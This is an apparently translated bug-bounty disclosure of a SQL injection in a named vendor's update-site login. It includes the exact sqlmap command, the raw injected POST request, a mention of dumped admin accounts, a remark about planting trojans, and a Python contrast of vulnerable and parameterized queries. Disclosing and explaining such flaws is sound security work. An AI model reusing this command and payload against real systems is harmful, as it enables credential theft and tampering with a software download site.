2015-09-02: Details reported to the vendor, awaiting the vendor's handling
2015-09-02: Vendor confirmed; details disclosed to the vendor only
2015-09-12: Details disclosed to core white hats and experts in the relevant field
2015-09-22: Details disclosed to regular white hats
2015-10-02: Details disclosed to intern white hats
2015-10-17: Details disclosed to the public
http://update.funshion.com/login/index.php?c=login&a=login&so=begin has a POST injection. This is a classic sqlmap use case, but I ran it many times and it would not work, not even with tamper scripts. After studying it in Burp for a while: the payload only works with a `'` prefixed to it:
>sqlmap.py -r e:\1.txt --prefix "'" --dbs
Please give 20 Rank, the harm here is no joke. One trojan planted on this download site and it's 6666. Asking for a 雷!!!!
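As an added illustration (not code from the report or from the vendor), the query pattern behind a finding like this: a login lookup that concatenates the POST `username` field into a quoted SQL literal, beside the parameterized form. The table layout follows the dump's column headers, but the rows, hashes and the SQLite backend are constructed stand-ins.

```python
import hashlib
import sqlite3

# Constructed sample rows for the demo; not the real fs_sys_user contents.
SAMPLE_USERS = [
    (1, "admin", hashlib.md5(b"example-admin-pw").hexdigest(), 1),
    (2, "guochao", hashlib.md5(b"example-user-pw").hexdigest(), 0),
]


def make_db():
    """In-memory stand-in for the login backend's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE fs_sys_user (user_id INTEGER, user_name TEXT, "
                 "password TEXT, is_super_user INTEGER)")
    conn.executemany("INSERT INTO fs_sys_user VALUES (?, ?, ?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password_md5):
    """Concatenates the POST fields into the SQL text. A quote inside
    `username` closes the string literal, so the rest is parsed as SQL;
    the stray quote in `aaaa'` produces a syntax error, which is why the
    report's payload only worked with a `'` prefix."""
    sql = ("SELECT user_id, is_super_user FROM fs_sys_user "
           "WHERE user_name = '%s' AND password = '%s'" % (username, password_md5))
    return conn.execute(sql).fetchone()


def login_safe(conn, username, password_md5):
    """Bound parameters: values travel separately from the SQL text, so a
    quote in `username` is only a character to match, never syntax."""
    sql = ("SELECT user_id, is_super_user FROM fs_sys_user "
           "WHERE user_name = ? AND password = ?")
    return conn.execute(sql, (username, password_md5)).fetchone()


def demo():
    """Runs both variants against the same input and returns the outcomes."""
    conn = make_db()
    pw = hashlib.md5(b"example-admin-pw").hexdigest()
    results = {"ok": login_safe(conn, "admin", pw),
               "quote_safe": login_safe(conn, "aaaa'", pw)}
    try:
        login_vulnerable(conn, "aaaa'", pw)
        results["quote_vuln"] = "no error"
    except sqlite3.OperationalError as e:
        results["quote_vuln"] = "error: " + str(e)
    return results
```

The same quoted username that breaks the concatenated query is simply a non-matching value for the parameterized one.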
POST /login/index.php?c=login&a=login&so=end HTTP/1.1
Host: update.funshion.com
Content-Length: 58
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://update.funshion.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://update.funshion.com/login/index.php?c=login&a=login&so=end
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: PHPSESSID=f777sgdacq5chrpct6qtjgl137

username=aaaa%27&password=803e80d5e6318ca76c3709205b2af3c9
POST data
Admin accounts (sqlmap dump of table fs_sys_user, 13 entries)
http://neirong.funshion.com/updater/7/2.3.1.23/package/FunshionAphone2.3.1.23_sid_1010_zipalign.apk
APK download address; verified to be a genuine official-site link.
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-09-02 14:35
Thank you very much for your attention to Funshion's security.
None yet